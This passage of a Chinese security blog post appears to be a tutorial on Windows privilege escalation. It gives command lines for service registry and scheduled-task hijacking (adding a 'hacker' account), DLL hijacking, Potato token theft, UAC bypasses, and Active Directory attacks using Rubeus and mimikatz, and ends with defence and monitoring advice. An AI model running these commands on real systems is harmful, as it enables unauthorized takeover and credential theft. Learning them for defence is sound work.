<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 检查自启动项</span><br>reg query <span class="hljs-string">&quot;HKLM\Software\Microsoft\Windows\CurrentVersion\Run&quot;</span><br><br><span class="hljs-comment"># 检查服务注册表权限</span><br>accesschk.exe -accepteula -k <span class="hljs-string">&quot;HKLM\System\CurrentControlSet\Services\ServiceName&quot;</span><br><br><span class="hljs-comment"># 修改服务 ImagePath</span><br>reg add <span class="hljs-string">&quot;HKLM\SYSTEM\CurrentControlSet\Services\ServiceName&quot;</span> /v ImagePath /t REG_EXPAND_SZ /d <span class="hljs-string">&quot;C:\evil.exe&quot;</span> /f<br></code></pre></td></tr></table></figure>

<h3 id="4-5-计划任务提权"><a href="#4-5-计划任务提权" class="headerlink" title="4.5 计划任务提权"></a>4.5 计划任务提权</h3><p>计划任务常以 SYSTEM 运行。如果任务脚本可被修改，即可劫持：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 列出计划任务</span><br>schtasks /query /fo LIST /v<br><br><span class="hljs-comment"># 检查脚本权限</span><br>icacls <span class="hljs-string">&quot;C:\Scripts\backup.bat&quot;</span><br><br><span class="hljs-comment"># 追加恶意命令</span><br><span class="hljs-built_in">echo</span> net user hacker P@ssw0rd123 /add &gt;&gt; C:\Scripts\backup.bat<br><br><span class="hljs-comment"># 手动触发</span><br>schtasks /run /tn <span class="hljs-string">&quot;TaskName&quot;</span><br></code></pre></td></tr></table></figure>

<h3 id="4-6-DLL-劫持"><a href="#4-6-DLL-劫持" class="headerlink" title="4.6 DLL 劫持"></a>4.6 DLL 劫持</h3><p>Windows DLL 搜索顺序：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">1. 可执行文件所在目录<br>2. C:\Windows\System32<br>3. C:\Windows<br>4. PATH 环境变量中的目录<br>5. ...<br></code></pre></td></tr></table></figure>

<p>如果搜索路径中包含可写目录，攻击者放置同名恶意 DLL 即可被优先加载。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 检查 PATH 中可写目录</span><br>accesschk.exe /accepteula -uwdq <span class="hljs-string">&quot;%PATH%&quot;</span><br><br><span class="hljs-comment"># PowerUp 检测</span><br>Find-PathDLLHijack<br></code></pre></td></tr></table></figure>

<p>使用 <strong>Procmon</strong> 监控 DLL 加载：设置过滤器 <code>Result = NAME NOT FOUND</code> 且 <code>Path 以 .dll 结尾</code>，可发现程序尝试加载但找不到的 DLL。</p>
<h3 id="4-7-其他配置错误"><a href="#4-7-其他配置错误" class="headerlink" title="4.7 其他配置错误"></a>4.7 其他配置错误</h3><table>
<thead>
<tr>
<th>类型</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td><strong>AutoLogon 凭据</strong></td>
<td>注册表 <code>Winlogon\DefaultPassword</code> 明文存储管理员密码</td>
</tr>
<tr>
<td><strong>Unattend 文件</strong></td>
<td>无人值守安装文件含 Base64 编码的管理员密码</td>
</tr>
<tr>
<td><strong>PowerShell 历史</strong></td>
<td><code>ConsoleHost_history.txt</code> 中可能记录含密码的命令</td>
</tr>
<tr>
<td><strong>VNC&#x2F;SNMP 密码</strong></td>
<td>注册表中可能存储编码密码</td>
</tr>
</tbody></table>
<hr>
<h2 id="五、特权滥用提权"><a href="#五、特权滥用提权" class="headerlink" title="五、特权滥用提权"></a>五、特权滥用提权</h2><p>利用已有特权（主要是 SeImpersonatePrivilege）进行令牌模拟，从服务账户提升到 SYSTEM。</p>
<h3 id="5-1-Potato-攻击核心原理"><a href="#5-1-Potato-攻击核心原理" class="headerlink" title="5.1 Potato 攻击核心原理"></a>5.1 Potato 攻击核心原理</h3><p>所有 Potato 攻击共享同一原语：</p>
<blockquote>
<p>拥有 <strong>SeImpersonatePrivilege</strong> 的服务账户，通过强制 SYSTEM 进程向攻击者控制的端点认证，利用模拟权限窃取 SYSTEM 令牌，最终通过 <code>CreateProcessAsUser</code> 创建 SYSTEM 进程。</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">1. 攻击者创建命名管道 / RPC 端点<br>2. 诱使 SYSTEM 进程连接<br>3. 利用 SeImpersonatePrivilege 模拟 SYSTEM<br>4. 窃取并复制 SYSTEM 令牌<br>5. CreateProcessAsUser(SYSTEM_token, &quot;cmd.exe&quot;)<br></code></pre></td></tr></table></figure>

<h3 id="5-2-Potato-工具演进"><a href="#5-2-Potato-工具演进" class="headerlink" title="5.2 Potato 工具演进"></a>5.2 Potato 工具演进</h3><table>
<thead>
<tr>
<th>工具</th>
<th>触发机制</th>
<th>适用系统</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td><strong>JuicyPotato</strong></td>
<td>DCOM RPC</td>
<td>Win10 1809 以前</td>
<td>旧版有效，新版已修补</td>
</tr>
<tr>
<td><strong>PrintSpoofer</strong></td>
<td>Print Spooler 管道</td>
<td>Win10&#x2F;Server 2016+</td>
<td>现代系统推荐</td>
</tr>
<tr>
<td><strong>RoguePotato</strong></td>
<td>PrintNotify COM</td>
<td>Win10 1809+</td>
<td>需要辅助机器</td>
</tr>
<tr>
<td><strong>SweetPotato</strong></td>
<td>DCOM + 管道</td>
<td>通用</td>
<td>统一触发方式</td>
</tr>
<tr>
<td><strong>GodPotato</strong></td>
<td>综合 RPC&#x2F;DCOM</td>
<td>现代系统</td>
<td>兼容性最佳</td>
</tr>
</tbody></table>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># JuicyPotato（旧系统）</span><br>JuicyPotato.exe -l 1337 -p <span class="hljs-string">&quot;cmd.exe&quot;</span> -a <span class="hljs-string">&quot;/c whoami&quot;</span> -t *<br><br><span class="hljs-comment"># PrintSpoofer（现代系统推荐）</span><br>PrintSpoofer.exe -i -c <span class="hljs-string">&quot;cmd.exe /c whoami&quot;</span><br><br><span class="hljs-comment"># GodPotato（兼容性最好）</span><br>GodPotato.exe -cmd <span class="hljs-string">&quot;cmd /c whoami&quot;</span><br></code></pre></td></tr></table></figure>

<blockquote>
<p>Win10 1809+ 首选 PrintSpoofer 或 GodPotato。PrintSpoofer 依赖 Print Spooler 服务，部分 Server Core 默认关闭。</p>
</blockquote>
<h3 id="5-3-SeDebugPrivilege-利用"><a href="#5-3-SeDebugPrivilege-利用" class="headerlink" title="5.3 SeDebugPrivilege 利用"></a>5.3 SeDebugPrivilege 利用</h3><p>拥有 SeDebugPrivilege 可附加任意进程，读取其内存并窃取令牌：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">1. OpenProcess(SYSTEM_PID, PROCESS_ALL_ACCESS)<br>2. OpenProcessToken → 获取 SYSTEM 令牌<br>3. DuplicateTokenEx → 复制令牌<br>4. CreateProcessWithTokenW → 创建 SYSTEM 进程<br></code></pre></td></tr></table></figure>

<hr>
<h2 id="六、UAC-绕过提权"><a href="#六、UAC-绕过提权" class="headerlink" title="六、UAC 绕过提权"></a>六、UAC 绕过提权</h2><p>当当前用户<strong>已是管理员组成员</strong>（但处于 Filtered Token 状态），可通过 UAC 绕过静默提升到 High Integrity，无需弹出提示。</p>
<h3 id="6-1-自动提升机制"><a href="#6-1-自动提升机制" class="headerlink" title="6.1 自动提升机制"></a>6.1 自动提升机制</h3><p>某些 Microsoft 签名二进制可静默提升，需同时满足：</p>
<ul>
<li>嵌入清单中 <code>autoElevate = true</code></li>
<li>由 Microsoft 签名</li>
<li>位于 <code>C:\Windows\System32</code></li>
</ul>
<h3 id="6-2-常见绕过方法"><a href="#6-2-常见绕过方法" class="headerlink" title="6.2 常见绕过方法"></a>6.2 常见绕过方法</h3><p><strong>fodhelper.exe 注册表劫持：</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">reg add HKCU\Software\Classes\ms-settings\Shell\Open\<span class="hljs-built_in">command</span> /d <span class="hljs-string">&quot;cmd.exe /c whoami&quot;</span> /f<br>reg add HKCU\Software\Classes\ms-settings\Shell\Open\<span class="hljs-built_in">command</span> /v <span class="hljs-string">&quot;DelegateExecute&quot;</span> /f<br>fodhelper.exe<br></code></pre></td></tr></table></figure>

<p><strong>eventvwr.exe 绕过：</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">reg add HKCU\Software\Classes\mscfile\Shell\Open\<span class="hljs-built_in">command</span> /d <span class="hljs-string">&quot;cmd.exe /c whoami&quot;</span> /f<br>eventvwr.exe<br></code></pre></td></tr></table></figure>

<p><strong>computerdefaults.exe 绕过：</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">reg add HKCU\Software\Classes\ms-settings\Shell\Open\<span class="hljs-built_in">command</span> /d <span class="hljs-string">&quot;cmd.exe /c whoami&quot;</span> /f<br>computerdefaults.exe<br></code></pre></td></tr></table></figure>

<h3 id="6-3-UACME-工具"><a href="#6-3-UACME-工具" class="headerlink" title="6.3 UACME 工具"></a>6.3 UACME 工具</h3><p>UACME 包含数十种绕过技术：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">UACME.exe -a 3  <span class="hljs-comment"># 方法 3 对应 fodhelper 绕过</span><br></code></pre></td></tr></table></figure>

<blockquote>
<p>UAC 绕过要求当前用户是管理员组成员。标准用户无法使用此路径。</p>
</blockquote>
<hr>
<h2 id="七、Active-Directory-域环境提权"><a href="#七、Active-Directory-域环境提权" class="headerlink" title="七、Active Directory 域环境提权"></a>七、Active Directory 域环境提权</h2><p>域环境提权通过 AD 信任关系、Kerberos 协议和组策略，从低权限域用户提升到 Domain Admin。</p>
<h3 id="7-1-BloodHound-路径分析"><a href="#7-1-BloodHound-路径分析" class="headerlink" title="7.1 BloodHound 路径分析"></a>7.1 BloodHound 路径分析</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 使用 SharpHound 收集</span><br>SharpHound.exe --CollectionMethods All --Domain domain.local<br><br><span class="hljs-comment"># 导入 BloodHound GUI，查询最短攻击路径</span><br><span class="hljs-comment"># 例如：&quot;当前用户到 Domain Admin 的最短路径&quot;</span><br></code></pre></td></tr></table></figure>

<h3 id="7-2-Kerberoasting"><a href="#7-2-Kerberoasting" class="headerlink" title="7.2 Kerberoasting"></a>7.2 Kerberoasting</h3><p>任何域用户可请求 SPN 的 TGS 票据，离线破解服务账户密码：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 使用 Rubeus</span><br>Rubeus.exe kerberoast /outfile:hashes.txt<br><br><span class="hljs-comment"># 离线破解</span><br>hashcat -m 13100 hashes.txt wordlist.txt<br></code></pre></td></tr></table></figure>

<h3 id="7-3-AS-REP-Roasting"><a href="#7-3-AS-REP-Roasting" class="headerlink" title="7.3 AS-REP Roasting"></a>7.3 AS-REP Roasting</h3><p>针对设置了 <code>DONT_REQUIRE_PREAUTH</code> 的账户，无需密码即可请求 AS-REP 票据：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 查找不需要预认证的账户</span><br>Get-ADUser -Filter &#123;DoesNotRequirePreAuth -eq <span class="hljs-variable">$true</span>&#125;<br><br><span class="hljs-comment"># 使用 Rubeus</span><br>Rubeus.exe asreproast /nowrap /outfile:hashes.txt<br></code></pre></td></tr></table></figure>

<h3 id="7-4-Pass-the-Hash-Pass-the-Ticket"><a href="#7-4-Pass-the-Hash-Pass-the-Ticket" class="headerlink" title="7.4 Pass the Hash &#x2F; Pass the Ticket"></a>7.4 Pass the Hash &#x2F; Pass the Ticket</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># Pass the Hash</span><br>mimikatz <span class="hljs-comment"># sekurlsa::pth /user:admin /domain:domain.local /ntlm:hash_here</span><br><br><span class="hljs-comment"># Pass the Ticket</span><br>mimikatz <span class="hljs-comment"># kerberos::ptt /ticket:ticket.kirbi</span><br><br><span class="hljs-comment"># Golden Ticket（伪造 TGT）</span><br>mimikatz <span class="hljs-comment"># kerberos::golden /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /user:admin /ptt</span><br></code></pre></td></tr></table></figure>

<h3 id="7-5-GPP-密码解密"><a href="#7-5-GPP-密码解密" class="headerlink" title="7.5 GPP 密码解密"></a>7.5 GPP 密码解密</h3><p>组策略首选项（GPP）密码使用公开的 AES 密钥加密，可解密 SYSVOL 中的 <code>Groups.xml</code>：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">dir</span> /b /s \\domain.local\SYSVOL\*.xml<br>gpp-decrypt <span class="hljs-string">&quot;encrypted_password_here&quot;</span><br></code></pre></td></tr></table></figure>

<hr>
<h2 id="八、自动化提权工具"><a href="#八、自动化提权工具" class="headerlink" title="八、自动化提权工具"></a>八、自动化提权工具</h2><p>手动检查容易遗漏，自动化工具可系统性扫描提权面。实际中通常组合使用。</p>
<table>
<thead>
<tr>
<th>工具</th>
<th>语言</th>
<th>核心功能</th>
<th>适用场景</th>
</tr>
</thead>
<tbody><tr>
<td><strong>WinPEAS</strong></td>
<td>C#</td>
<td>全面枚举，红&#x2F;黄高亮</td>
<td>首次全面检查</td>
</tr>
<tr>
<td><strong>PowerUp</strong></td>
<td>PowerShell</td>
<td>服务检查 + 自动利用</td>
<td>PS 环境</td>
</tr>
<tr>
<td><strong>Seatbelt</strong></td>
<td>C#</td>
<td>主机信息收集</td>
<td>系统评估</td>
</tr>
<tr>
<td><strong>PrivescCheck</strong></td>
<td>PowerShell</td>
<td>结构化检查报告</td>
<td>报告生成</td>
</tr>
<tr>
<td><strong>Watson</strong></td>
<td>C#</td>
<td>补丁与漏洞比对</td>
<td>漏洞识别</td>
</tr>
<tr>
<td><strong>WES</strong></td>
<td>Python</td>
<td>补丁缺失分析</td>
<td>补丁状态</td>
</tr>
<tr>
<td><strong>Sherlock</strong></td>
<td>PowerShell</td>
<td>已知漏洞检测</td>
<td>快速扫描</td>
</tr>
</tbody></table>
<p><strong>推荐工作流程：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">1. WinPEAS 全面扫描 → 获取高亮风险项<br>2. Seatbelt 补充主机信息<br>3. Watson / WES 检查补丁缺失<br>4. PowerUp Invoke-AllChecks 检测配置错误<br>5. 针对高风险项手动验证和利用<br></code></pre></td></tr></table></figure>

<hr>
<h2 id="九、防御与缓解"><a href="#九、防御与缓解" class="headerlink" title="九、防御与缓解"></a>九、防御与缓解</h2><h3 id="9-1-最小权限原则"><a href="#9-1-最小权限原则" class="headerlink" title="9.1 最小权限原则"></a>9.1 最小权限原则</h3><ul>
<li>服务账户使用最小权限，避免不必要的 SeImpersonatePrivilege &#x2F; SeDebugPrivilege</li>
<li>应用池账户不加入本地管理员组</li>
<li>普通用户不加入 Administrators 组</li>
<li>域账户避免拥有本地管理员权限</li>
</ul>
<h3 id="9-2-服务与注册表加固"><a href="#9-2-服务与注册表加固" class="headerlink" title="9.2 服务与注册表加固"></a>9.2 服务与注册表加固</h3><ul>
<li>服务路径用双引号包围</li>
<li>审计服务二进制和路径权限，移除普通用户写权限</li>
<li>禁用 AlwaysInstallElevated 组策略</li>
<li>审计 <code>HKLM\SYSTEM\CurrentControlSet\Services</code> 键权限</li>
<li>清理 Unattend 文件和配置文件中的明文密码</li>
</ul>
<h3 id="9-3-补丁管理"><a href="#9-3-补丁管理" class="headerlink" title="9.3 补丁管理"></a>9.3 补丁管理</h3><ul>
<li>保持补丁最新，关注本地提权 CVE</li>
<li>域控制器和客户端同步更新</li>
<li>使用 WSUS 控制部署节奏</li>
<li>高风险服务器建立快速回滚机制</li>
</ul>
<h3 id="9-4-监控审计"><a href="#9-4-监控审计" class="headerlink" title="9.4 监控审计"></a>9.4 监控审计</h3><table>
<thead>
<tr>
<th>事件 ID</th>
<th>描述</th>
<th>提权相关性</th>
</tr>
</thead>
<tbody><tr>
<td>4672</td>
<td>特殊权限分配</td>
<td>检测异常特权授予</td>
</tr>
<tr>
<td>4688</td>
<td>进程创建</td>
<td>监控可疑进程</td>
</tr>
<tr>
<td>4673</td>
<td>特权服务调用</td>
<td>检测特权滥用</td>
</tr>
<tr>
<td>4656</td>
<td>对象句柄请求</td>
<td>审计敏感文件访问</td>
</tr>
</tbody></table>
<ul>
<li>启用进程创建审核</li>
<li>监控 SeImpersonatePrivilege 使用</li>
<li>使用 EDR 检测异常令牌获取</li>
<li>定期审计日志</li>
</ul>
<hr>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>Windows 提权是多层次技术体系，实战中遵循以下方法论：</p>
<ol>
<li><strong>先收集，再利用</strong> — <code>systeminfo</code>、<code>whoami /priv</code>、<code>wmic qfe</code> + WinPEAS 全面收集</li>
<li><strong>内核优先</strong> — 未打补丁则 Watson&#x2F;WES 识别漏洞，选择稳定 Exploit</li>
<li><strong>配置兜底</strong> — 补丁完善时重点查服务路径、注册表权限、计划任务、DLL 搜索路径</li>
<li><strong>特权利用</strong> — <code>whoami /priv</code> 有 SeImpersonate 则 Potato，有 SeDebug 则进程注入</li>
<li><strong>域环境特殊路径</strong> — BloodHound 路径分析 + Kerberoasting&#x2F;AS-REP&#x2F;PTH</li>
</ol>
<p>防御核心是<strong>最小权限原则</strong>和<strong>配置加固</strong>：定期审计、及时打补丁、启用监控，可有效降低提权风险。</p>
<hr>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><ol>
<li><strong>HackTricks — Windows Local Privilege Escalation</strong> — 最全面的 Windows 提权技术 Wiki
<a target="_blank" rel="noopener" href="https://book.hacktricks.wiki/windows-hardening/windows-local-privilege-escalation/">https://book.hacktricks.wiki/windows-hardening/windows-local-privilege-escalation/</a></li>
<li><strong>PayloadsAllTheThings — Windows Privilege Escalation</strong> — 提权方法与命令速查
<a target="_blank" rel="noopener" href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md">https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md</a></li>
<li><strong>PEASS-ng (WinPEAS)</strong>  — 自动化权限枚举工具
<a target="_blank" rel="noopener" href="https://github.com/carlospolop/PEASS-ng">https://github.com/carlospolop/PEASS-ng</a></li>
<li><strong>PowerSploit (PowerUp)</strong>  — PowerShell 提权检查与利用
<a target="_blank" rel="noopener" href="https://github.com/PowerShellMafia/PowerSploit">https://github.com/PowerShellMafia/PowerSploit</a></li>
<li><strong>UACME</strong> — UAC 绕过技术集
<a target="_blank" rel="noopener" href="https://github.com/hfiref0x/UACME">https://github.com/hfiref0x/UACME</a></li>
<li><strong>SecWiki&#x2F;windows-kernel-exploits</strong> — Windows 内核漏洞利用集合
<a target="_blank" rel="noopener" href="https://github.com/SecWiki/windows-kernel-exploits">https://github.com/SecWiki/windows-kernel-exploits</a></li>
<li><strong>Microsoft Learn — UAC 工作原理</strong> — 官方 UAC 机制文档
<a target="_blank" rel="noopener" href="https://learn.microsoft.com/windows/security/application-security/application-control/user-account-control/how-it-works">https://learn.microsoft.com/windows/security/application-security/application-control/user-account-control/how-it-works</a></li>
<li><strong>BlackHat Asia 2021 — The Rise of Potatoes</strong> — Potato 攻击原理与演进
<a target="_blank" rel="noopener" href="https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Cocomazzi-The-Rise-of-Potatoes-Privilege-Escalations-in-Windows-Services.pdf">https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Cocomazzi-The-Rise-of-Potatoes-Privilege-Escalations-in-Windows-Services.pdf</a></li>
</ol>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta"><i class="fas fa-circle-user fa-fw"></i>文章作者: </span><span class="post-copyright-info"><a href="https://liebert77.github.io">Liebert77</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta"><i class="fas fa-square-arrow-up-right fa-fw"></i>文章链接: </span><span class="post-copyright-info"><a href="https://liebert77.github.io/posts/778cb5e4/">https://liebert77.github.io/posts/778cb5e4/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta"><i class="fas fa-circle-exclamation fa-fw"></i>版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来源 <a href="https://liebert77.github.io" target="_blank">Liebert77の博客</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E6%8A%80%E6%9C%AF%E6%9D%82%E9%A1%B9/">技术杂项</a></div><div class="post-share"><div class="social-share" data-image="https://z.wiki/u/1774pAqTn" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdnjs.onmicrosoft.cn/ajax/libs/butterfly-extsrc/1.1.4/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdnjs.onmicrosoft.cn/ajax/libs/butterfly-extsrc/1.1.4/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><a class="pagination-related full-width" href="/posts/235e4160/" title="Linux提权小结"><img class="cover" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://z.wiki/u/gbG1N1xSR" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="info"><div class="info-1"><div class="info-item-1">上一篇</div><div class="info-item-2">Linux提权小结</div></div><div class="info-2"><div class="info-item-1">Linux提权小结</div></div></div></a></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><a class="pagination-related" href="/posts/1c3aceaf/" title="LLM提示词注入攻击"><img class="cover" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://z.wiki/u/8fSOsdP00" alt="cover"><div class="info text-center"><div class="info-1"><div class="info-item-1"><i class="far fa-calendar-alt fa-fw"></i> 2026-06-28</div><div class="info-item-2">LLM提示词注入攻击</div></div><div class="info-2"><div class="info-item-1">LLM提示词注入攻击</div></div></div></a><a class="pagination-related" href="/posts/235e4160/" title="Linux提权小结"><img class="cover" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://z.wiki/u/gbG1N1xSR" alt="cover"><div class="info text-center"><div class="info-1"><div class="info-item-1"><i class="far fa-calendar-alt fa-fw"></i> 2026-07-26</div><div class="info-item-2">Linux提权小结</div></div><div class="info-2"><div class="info-item-1">Linux提权小结</div></div></div></a><a class="pagination-related" href="/posts/44ce37ec/" title="Windows终端美化方案"><img class="cover" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://z.wiki/u/P7k76n5DO" alt="cover"><div class="info text-center"><div class="info-1"><div class="info-item-1"><i class="far fa-calendar-alt fa-fw"></i> 2026-02-24</div><div class="info-item-2">Windows终端美化方案</div></div><div class="info-2"><div class="info-item-1">Windows终端美化方案</div></div></div></a></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info text-center"><div class="avatar-img"><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/head.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info-name">Liebert77</div><div class="author-info-description">Liebert77の网络安全学习之旅</div><div class="site-data"><a href="/archives/"><div class="headline">文章</div><div class="length-num">46</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">25</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">6</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/liebert77"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons"><a class="social-icon" href="https://github.com/liebert77" target="_blank" title="Github"><i class="fab fa-github" style="color: #24292e;"></i></a><a class="social-icon" href="mailto:3328677844@qq.com" target="_blank" title="Email"><i class="fas fa-envelope" style="color: #4a7dbe;"></i></a><a class="social-icon" href="tencent://message/?uin=3328677844" target="_blank" title="QQ"><i class="fab fa-qq" style="color: #12B7F5;"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">欢迎来到我的博客！<br>关注DK盾谢谢喵！</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%95%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">引言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81Windows-%E6%9D%83%E9%99%90%E4%BD%93%E7%B3%BB%E5%9F%BA%E7%A1%80"><span class="toc-number">2.</span> <span class="toc-text">一、Windows 权限体系基础</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-1-%E7%94%A8%E6%88%B7%E8%A7%92%E8%89%B2"><span class="toc-number">2.1.</span> <span class="toc-text">1.1 用户角色</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1-2-%E5%AE%8C%E6%95%B4%E6%80%A7%E7%BA%A7%E5%88%AB%EF%BC%88Integrity-Level%EF%BC%89"><span class="toc-number">2.2.</span> <span class="toc-text">1.2 完整性级别（Integrity Level）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1-3-UAC-%E6%9C%BA%E5%88%B6"><span class="toc-number">2.3.</span> <span class="toc-text">1.3 UAC 机制</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1-4-%E5%85%B3%E9%94%AE%E7%89%B9%E6%9D%83"><span class="toc-number">2.4.</span> <span class="toc-text">1.4 关键特权</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E6%8F%90%E6%9D%83%E5%89%8D%E7%BD%AE%EF%BC%9A%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">3.</span> <span class="toc-text">二、提权前置：信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#2-1-%E7%B3%BB%E7%BB%9F%E4%BF%A1%E6%81%AF"><span class="toc-number">3.1.</span> <span class="toc-text">2.1 系统信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-2-%E7%94%A8%E6%88%B7%E4%B8%8E%E6%9D%83%E9%99%90"><span class="toc-number">3.2.</span> <span class="toc-text">2.2 用户与权限</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-3-%E6%9C%8D%E5%8A%A1%E4%B8%8E%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1"><span class="toc-number">3.3.</span> <span class="toc-text">2.3 服务与计划任务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" 